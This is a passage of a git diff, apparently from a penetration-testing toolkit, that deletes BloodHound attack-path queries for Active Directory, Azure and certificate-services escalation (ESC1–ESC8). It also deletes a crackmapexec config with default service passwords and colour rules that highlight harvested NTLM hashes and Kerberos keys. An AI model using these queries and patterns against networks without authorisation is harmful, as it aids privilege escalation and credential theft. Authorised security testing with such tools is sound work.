RETURN c2" - }] - }, - { - "name": "(Warning: edits the DB) Mark unconstrained delegation systems as high value targets", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers SET c2.highvalue = true RETURN c2" - }] - }, - { - "name": "Shortest paths from owned principals to unconstrained delegation systems", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (n {owned:true}) MATCH p=shortestPath((n)-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..]->(m:Computer {unconstraineddelegation: true})) WHERE NOT n=m RETURN p" - }] - }, - { - "name": "Find computers with constrained delegation permissions and the corresponding targets where they allowed to delegate", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE c.allowedtodelegate IS NOT NULL RETURN c" - }] - }, - { - "name": "Find computers admin to other computers", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH p = (c1:Computer)-[r1:AdminTo]->(c2:Computer) RETURN p UNION ALL MATCH p = (c3:Computer)-[r2:MemberOf*1..]->(g:Group)-[r3:AdminTo]->(c4:Computer) RETURN p" - }] - }, - { - "name": "Logged in Admins", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH p=(a:Computer)-[r:HasSession]->(b:User) WITH a,b,r MATCH p=shortestPath((b)-[:AdminTo|MemberOf*1..]->(a)) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Users with local admin rights", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p" - }] - }, - { - "name": "Domain admin sessions", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH (n:User)-[:MemberOf]->(g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = (c:Computer)-[:HasSession]->(n) return p" - }] - }, - { - "name": "Users with adminCount, not sensitive for delegation, not members of Protected Users", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH (u)-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ \"(?i)S-1-5-.*-525\" WITH COLLECT (u.name) as protectedUsers MATCH p=(u2:User)-[:MemberOf*1..3]->(g2:Group) WHERE u2.admincount=true AND u2.sensitive=false AND NOT u2.name IN protectedUsers RETURN p" - }] - }, - { - "name": "Groups that contain the word 'admin'", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "Match (n:Group) WHERE n.name CONTAINS 'ADMIN' RETURN n" - }] - }, - { - "name": "Groups of High Value Targets", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p" - }] - }, - { - "name": "Non Admin Groups with High Value Privileges", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH p=(g:Group)-[r:Owns|:WriteDacl|:GenericAll|:WriteOwner|:ExecuteDCOM|:GenericWrite|:AllowedToDelegate|:ForceChangePassword]->(n:Computer) WHERE NOT g.name CONTAINS 'ADMIN' RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Groups with Computer and User Objects", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer)-[r:MemberOf*1..]->(groupsWithComps:Group) WITH groupsWithComps MATCH (u:User)-[r:MemberOf*1..]->(groupsWithComps) RETURN DISTINCT(groupsWithComps) as groupsWithCompsAndUsers", - "allowCollapse": true, - "endNode": "{}" - }] - }, - { - "name": "Groups that can reset passwords (Warning: Heavy)", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p" - }] - }, - { - "name": "Groups that have local admin rights (Warning: Heavy)", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p" - }] - }, - { - "name": "Users never logged on and account still active", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User) WHERE n.lastlogontimestamp=-1.0 AND n.enabled=TRUE RETURN n " - }] - }, - { - "name": "Users logged in the last 90 days", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH (u:User) WHERE u.lastlogon < (datetime().epochseconds - (90 * 86400)) and NOT u.lastlogon IN [-1.0, 0.0] RETURN u" - }] - }, - { - "name": "Users with passwords last set in the last 90 days", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH (u:User) WHERE u.pwdlastset < (datetime().epochseconds - (90 * 86400)) and NOT u.pwdlastset IN [-1.0, 0.0] RETURN u" - }] - }, - { - "name": "Find if unprivileged users have rights to add members into groups", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-[r:AddMember*1..]->(m:Group)) RETURN p" - }] - }, - { - "name": "Find all users a part of the VPN group", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "Match p=(u:User)-[:MemberOf]->(g:Group) WHERE toUPPER (g.name) CONTAINS 'VPN' return p" - }] - }, - { - "name": "View all GPOs", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "Match (n:GPO) RETURN n" - }] - }, - { - "name": "Find if any domain user has interesting permissions against a GPO (Warning: Heavy)", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH p=(u:User)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|GpLink*1..]->(g:GPO) RETURN p" - }] - }, - { - "name": "Can a user from domain ‘A ‘ do anything to any computer in domain ‘B’ (Warning: VERY Heavy)", - "category": "There are skittles in there!", - "queryList": [{ - "final": false, - "title": "Select source domain...", - "query": "MATCH (n:Domain) RETURN n.name ORDER BY n.name DESC" - }, - { - "final": false, - "title": "Select destination domain...", - "query": "MATCH (n:Domain) RETURN n.name ORDER BY n.name DESC" - }, - { - "final": true, - "query": "MATCH (n:User {domain: {result}}) MATCH (m:Computer {domain: {}}) MATCH p=allShortestPaths((n)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(m)) RETURN p", - "startNode": "{}", - "allowCollapse": false - } - ] - }, - { - "name": "Find all computers running with Windows XP", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS 'XP' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows 2000", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2000' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows 2003", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2003' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows 2008", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2008' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows Vista", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS 'VISTA' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows 7", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '7' RETURN c" - }] - }, - { - "name": "Top Ten Users with Most Sessions", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Top Ten Computers with Most Sessions", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Top Ten Users with Most Local Admin Rights", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Top Ten Computers with Most Admins and their admins", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Top Ten Computers with Most Admins", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN m", - "allowCollapse": true - }] - }, - { - "name": "(Warning: edits the DB) Mark Top Ten Computers with Most Admins as HVT", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) SET m.highvalue = true RETURN m", - "allowCollapse": true - }] - }, - { - "name": "Top 20 nodes with most first degree object controls", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH p=(u)-[r1]->(n) WHERE r1.isacl = true WITH u, count(r1) AS count_ctrl ORDER BY count_ctrl DESC LIMIT 20 RETURN u", - "allowCollapse": true - }] - }, - { - "name": "Top ten nodes with most group delegated object controls", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH p=(u)-[r1:MemberOf*1..]->(g:Group)-[r2]->(n) WHERE r2.isacl=true WITH u, count(r2) AS count_ctrl ORDER BY count_ctrl DESC LIMIT 20 RETURN u", - "allowCollapse": true - }] - }, - { - "name": "Find machines Domain Users can RDP into", - "category": "We can’t find Doug", - "queryList": [{ - "final": true, - "query": "match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' return p" - }] - }, - { - "name": "Find Servers Domain Users can RDP To", - "category": "We can’t find Doug", - "queryList": [{ - "final": true, - "query": "match p=(g:Group)-[:CanRDP]->(c:Computer) where g.name STARTS WITH 'DOMAIN USERS' AND c.operatingsystem CONTAINS 'Server' return p", - "allowCollapse": true - }] - }, - { - "name": "Find what groups can RDP", - "category": "We can’t find Doug", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p" - }] - }, - { - "name": "Return All Azure Users that are part of the ‘Global Administrator’ Role", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p" - }] - }, - { - "name": "Return All On-Prem users with edges to Azure", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p" - }] - }, - { - "name": "Find all paths to an Azure VM", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p = (n)-[r]->(g:AZVM) RETURN p" - }] - }, - { - "name": "Find all paths to an Azure KeyVault", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p" - }] - }, - { - "name": "Return All Azure Users and their Groups", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid CONTAINS 'S-1-5' RETURN p" - }] - }, - { - "name": "Return All Azure AD Groups that are synchronized with On-Premise AD", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n" - }] - }, - { - "name": "Find all Privileged Service Principals", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p" - }] - }, - { - "name": "Find all Owners of Azure Applications", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p" - }] - }, - { - "name": "Find all Certificate Templates", - "category": "Certificates", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' RETURN n" - }] - }, - { - "name": "Find enabled Certificate Templates", - "category": "Certificates", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' and n.Enabled = true RETURN n" - }] - }, - { - "name": "Find Certificate Authorities", - "category": "Certificates", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Enrollment Service' RETURN n" - }] - }, - { - "name": "Show Enrollment Rights for Certificate Template", - "category": "Certificates", - "queryList": [{ - "final": false, - "title": "Select a Certificate Template...", - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' RETURN n.name" - }, - { - "final": true, - "query": "MATCH p=(g)-[:Enroll|AutoEnroll]->(n:GPO {name:$result}) WHERE n.type = 'Certificate Template' return p", - "allowCollapse": false - }] - }, - { - "name": "Show Rights for Certificate Authority", - "category": "Certificates", - "queryList": [{ - "final": false, - "title": "Select a Certificate Authority...", - "query": "MATCH (n:GPO) WHERE n.type = 'Enrollment Service' RETURN n.name" - }, - { - "final": true, - "query": "MATCH p=(g)-[:ManageCa|ManageCertificates|Auditor|Operator|Read|Enroll]->(n:GPO {name:$result}) return p", - "allowCollapse": false - }] - }, - { - "name": "Find Misconfigured Certificate Templates (ESC1)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' and n.`Enrollee Supplies Subject` = true and n.`Client Authentication` = true and n.`Enabled` = true RETURN n" - }] - }, - { - "name": "Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC1)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.`Enrollee Supplies Subject` = true and n.`Client Authentication` = true and n.`Enabled` = true return p" - }] - }, - { - "name": "Find Misconfigured Certificate Templates (ESC2)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' and n.`Enabled` = true and (n.`Extended Key Usage` = [] or 'Any Purpose' IN n.`Extended Key Usage`) RETURN n" - }] - }, - { - "name": "Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC2)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.`Enabled` = true and (n.`Extended Key Usage` = [] or 'Any Purpose' IN n.`Extended Key Usage`) return p" - }] - }, - { - "name": "Find Enrollment Agent Templates (ESC3)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' and n.`Enabled` = true and (n.`Extended Key Usage` = [] or 'Any Purpose' IN n.`Extended Key Usage` or 'Certificate Request Agent' IN n.`Extended Key Usage`) RETURN n" - }] - }, - { - "name": "Shortest Paths to Enrollment Agent Templates from Owned Principals (ESC3)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.`Enabled` = true and (n.`Extended Key Usage` = [] or 'Any Purpose' IN n.`Extended Key Usage` or 'Certificate Request Agent' IN n.`Extended Key Usage`) return p" - }] - }, - { - "name": "Shortest Paths to Vulnerable Certificate Template Access Control (ESC4)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((g)-[:GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.`Enabled` = true RETURN p" - }] - }, - { - "name": "Shortest Paths to Vulnerable Certificate Template Access Control from Owned Principals (ESC4)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[r*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.Enabled = true and NONE(x in relationships(p) WHERE type(x) = 'Enroll' or type(x) = 'AutoEnroll') return p" - }] - }, - { - "name": "Find Certificate Authorities with User Specified SAN (ESC6)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Enrollment Service' and n.`User Specified SAN` = 'Enabled' RETURN n" - }] - }, - { - "name": "Shortest Paths to Vulnerable Certificate Authority Access Control (ESC7)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((g)-[r:GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ManageCa|ManageCertificates*1..]->(n:GPO)) WHERE g<>n and n.type = 'Enrollment Service' RETURN p" - }] - }, - { - "name": "Shortest Paths to Vulnerable Certificate Authority Access Control from Owned Principals (ESC7)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[*1..]->(n:GPO)) WHERE g<>n and n.type = 'Enrollment Service' and NONE(x in relationships(p) WHERE type(x) = 'Enroll' or type(x) = 'AutoEnroll') RETURN p" - }] - }, - { - "name": "Find Certificate Authorities with HTTP Web Enrollment (ESC8)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Enrollment Service' and n.`Web Enrollment` = 'Enabled' RETURN n" - }] - } - ] -} diff --git a/sources/crackmapexec/cme.conf b/sources/crackmapexec/cme.conf deleted file mode 100644 index 686183a8..00000000 --- a/sources/crackmapexec/cme.conf +++ /dev/null @@ -1,22 +0,0 @@ -[CME] -workspace = default -last_used_db = smb -pwn3d_label = admin - -[BloodHound] -bh_enabled = False -bh_uri = 127.0.0.1 -bh_port = 7687 -bh_user = neo4j -bh_pass = exegol4thewin - -[Empire] -api_host = 127.0.0.1 -api_port = 1337 -username = empireadmin -password = Password123! - -[Metasploit] -rpc_host = 127.0.0.1 -rpc_port = 55552 -password = abc123 \ No newline at end of file diff --git a/sources/grc/conf.cme b/sources/grc/conf.cme deleted file mode 100644 index 47576d23..00000000 --- a/sources/grc/conf.cme +++ /dev/null @@ -1,16 +0,0 @@ -# Signing True -regexp=signing\:True -colours=bold green -======= -# Signing False -regexp=signing\:False -colours=bold red -======= -# SMB1 True -regexp=SMBv1\:True -colours=yellow -======= -# SMBv1 False -regexp=SMBv1\:False -colours=blue -======= \ No newline at end of file diff --git a/sources/grc/conf.describeTicket b/sources/grc/conf.describeTicket deleted file mode 100644 index b8ee041d..00000000 --- a/sources/grc/conf.describeTicket +++ /dev/null @@ -1,28 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# Kerberoast -regexp=.*krb5tgs.* -colours=yellow -======= -# UserName -regexp=.*User Name.* -colours=magenta -======= -# UserRealm -regexp=.*User Realm.* -colours=magenta -======= -# ServiceName -regexp=.*Service Name.* -colours=magenta -======= diff --git a/sources/grc/conf.getgpppassword b/sources/grc/conf.getgpppassword deleted file mode 100644 index b462e230..00000000 --- a/sources/grc/conf.getgpppassword +++ /dev/null @@ -1,36 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# DEBUG SUCCESS -regexp=.*\[\+\] Found.* -colours=yellow -======= -# SUCCESS FOUND Files and directories -regexp=.*Found matching.* -colours=bold yellow -======= -# SUCCESS FOUND Username -regexp=.*newName.* -colours=green -======= -# SUCCESS FOUND Username -regexp=.*userName.* -colours=green -======= -# SUCCESS FOUND runAs -regexp=.*runAs.* -colours=green -======= -# SUCCESS FOUND Password -regexp=.*password.* -colours=bold green -======= \ No newline at end of file diff --git a/sources/grc/conf.krbrelayx b/sources/grc/conf.krbrelayx deleted file mode 100644 index 3d6cc4f8..00000000 --- a/sources/grc/conf.krbrelayx +++ /dev/null @@ -1,20 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# SUCCESS Ticket decrypt -regexp=.*Ticket decrypt OK.* -colours=green -======= -# SUCCESS Saving ticket -regexp=.*Saving ticket.* -colours=green -======= \ No newline at end of file diff --git a/sources/grc/conf.ntlmrelayx b/sources/grc/conf.ntlmrelayx deleted file mode 100644 index ebe7cdfe..00000000 --- a/sources/grc/conf.ntlmrelayx +++ /dev/null @@ -1,88 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# SUCCESS hashes -regexp=.{1,120}:\d{1,4}:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}::: -colours=bold green -======= -# SUCCESS DCC2 -regexp=.*DCC2.* -colours=green -======= -# SUCCESS Machine Account Kerberos aes256 key -regexp=.{1,120}:aes256-cts-hmac-sha1-96:[0-9a-fA-F]{64} -colours=green -======= -# SUCCESS Machine Account Kerberos aes128 key -regexp=.{1,120}:aes128-cts-hmac-sha1-96:[0-9a-fA-F]{32} -colours=green -======= -# SUCCESS Machine Account Kerberos des key -regexp=.{1,120}:des-cbc-md5:[0-9a-fA-F]{16} -colours=green -======= -# SUCCESS Machine Account plaintext password hex -regexp=.{1,120}:plain_password_hex:[0-9a-fA-F]{1,600} -colours=green -======= -# SUCCESS Machine Account NTLM keys -regexp=.{1,120}[0-9a-fA-F]{32}:[0-9a-fA-F]{32} -colours=bold green -======= -# SUCCESS Authentication success -regexp=.*Authenticating.*SUCCEED.* -colours=green -======= -# AdminStatus TRUE for SOCKS -regexp=.*TRUE.* -colours=green -======= -# Adding new computer -regexp=.*Adding new computer.*OK.* -colours=green -======= -# can impersonate success -regexp=.*can now impersonate users on.* -colours=green -======= -# delegate access success -regexp=.*Delegation rights modified succesfully.* -colours=green -======= -# SUCCESS Replication-Get-Changes-All -regexp=.*Success! User.*now has Replication-Get-Changes-All privileges on the domain -colours=green -======= -# SUCCESS Privilege escalation succesful -regexp=.*Privilege escalation succesful.* -colours=green -======= -# SUCCESS Try using DCSync with secretsdump.py -regexp=.*Try using DCSync with secretsdump.py.* -colours=green -======= -# SUCCESS Adding user -regexp=.*Adding user:.*to group.*OK -colours=green -======= -# SUCCESS User privileges found -regexp=.*User privileges found:.* -colours=green -======= -# SUCCESS Saved certs -regexp=.*Saved.* -colours=green -======= -# SUCCESS Updated attr -regexp=.*Updated.* -colours=green -======= diff --git a/sources/grc/conf.rbcd b/sources/grc/conf.rbcd deleted file mode 100644 index 06786113..00000000 --- a/sources/grc/conf.rbcd +++ /dev/null @@ -1,28 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# can impersonate success -regexp=.*can now impersonate users on.* -colours=green -======= -# delegate access success -regexp=.*Delegation rights modified succes.* -colours=green -======= -# delegate access success -regexp=.*can already impersonate users.* -colours=green -======= -# delegate access success -regexp=.*Delegation rights flushed succes.* -colours=green -======= \ No newline at end of file diff --git a/sources/grc/conf.secretsdump b/sources/grc/conf.secretsdump deleted file mode 100644 index 36cc971d..00000000 --- a/sources/grc/conf.secretsdump +++ /dev/null @@ -1,44 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# SUCCESS hashes -regexp=.{1,120}:\d{1,4}:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}::: -colours=bold green -======= -# SUCCESS DCC2 -regexp=.*DCC2.* -colours=green -======= -# SUCCESS Machine Account Kerberos aes256 key -regexp=.{1,120}:aes256-cts-hmac-sha1-96:[0-9a-fA-F]{64} -colours=green -======= -# SUCCESS Machine Account Kerberos aes128 key -regexp=.{1,120}:aes128-cts-hmac-sha1-96:[0-9a-fA-F]{32} -colours=green -======= -# SUCCESS Machine Account Kerberos des key -regexp=.{1,120}:des-cbc-md5:[0-9a-fA-F]{16} -colours=green -======= -# SUCCESS Machine Account Kerberos rc4 key -regexp=.{1,120}:rc4_hmac:[0-9a-fA-F]{32} -colours=green -======= -# SUCCESS Machine Account plaintext password hex -regexp=.{1,120}:plain_password_hex:[0-9a-fA-F]{1,600} -colours=green -======= -# SUCCESS Machine Account NTLM keys -regexp=.{1,120}[0-9a-fA-F]{32}:[0-9a-fA-F]{32} -colours=bold green -======= diff --git a/sources/grc/grc.conf b/sources/grc/grc.conf deleted file mode 100644 index 1f6d52dd..00000000 --- a/sources/grc/grc.conf +++ /dev/null @@ -1,320 +0,0 @@ -# cme -(^|[/\w\.]+/)g?crackmapexec\s? -conf.cme - -# rbcd -(^|[/\w\.]+/)g?rbcd.py\s? -conf.rbcd - -# describeTicket -(^|[/\w\.]+/)g?describeTicket.py\s? -conf.describeTicket - -# Get-GPPPassword -(^|[/\w\.]+/)g?Get-GPPPassword.py\s? -conf.getgpppassword - -# ntlmrelayx -(^|[/\w\.]+/)g?ntlmrelayx.py\s? -conf.ntlmrelayx - -# ntlmrelayx -(^|[/\w\.]+/)g?krbrelayx.py\s? -conf.krbrelayx - -# secretsdump -(^|[/\w\.]+/)g?secretsdump.py\s? -conf.secretsdump - -# dementor -(^|[/\w\.]+/)g?dementor.py\s? -conf.dementor - -# anything to do with irc -\b\w+\b.*irc.* -conf.irclog - -# log file -\b\w+\b.*log\b -conf.log - -# configure command -(^|[/\w\.]+/)?configure -conf.configure - -# ping command -(^|[/\w\.]+/)(io|o|n|h|arp|l2)?ping[236]?\s -conf.ping - -# traceroute command -(^|[/\w\.]+/)traceroute6?\s -conf.traceroute - -# gcc command -(^|[/\w\.]+/)(g?cc|[gc]\+\+)\s -conf.gcc - -# make command -(^|[/\w\.]+/)g?make\s? -conf.gcc - -# netstat command -(^|[/\w\.]+/)netstat\s? -conf.netstat - -# stat command -(^|[/\w\.]+/)stat\s? -conf.stat - -# ss command -(^|[/\w\.]+/)ss\s? -conf.ss - -# diff command -(^|[/\w\.]+/)diff\s? -conf.diff - -# wdiff command -(^|[/\w\.]+/)wdiff\s? -conf.wdiff - -# last/who command -(^|[/\w\.]+/)(lastb?|who|lastlog)\b -conf.last - -# ldap tools -(^|[/\w\.]+/)ldap -conf.ldap - -# cvs command -(^|[/\w\.]+/)cvs\s? -conf.cvs - -# mount command -(^|[/\w\.]+/)mount\s? -conf.mount - -# findmnt command -(^|[/\w\.]+/)findmnt\s? -conf.findmnt - -# mtr command -(^|[/\w\.]+/)mtr\s? -conf.mtr - -# ps command -(^|[/\w\.]+/)ps\s? -conf.ps - -# dig command -(^|[/\w\.]+/)dig\s? -conf.dig - -# ifconfig command -(^|[/\w\.]+/)ifconfig\s? -conf.ifconfig - -# ls command -(^|[/\w\.]+/)ls\s -conf.ls - -# mount -(^|[/\w\.]+/)mount\s? -conf.mount - -# df -(^|[/\w\.]+/)df\s? -conf.df - -# du -(^|[/\w\.]+/)du\s? -conf.du - -# ip addr/link -(^|[/\w\.]+/)ip a(ddr)*\s? -conf.ipaddr - -(^|[/\w\.]+/)ip 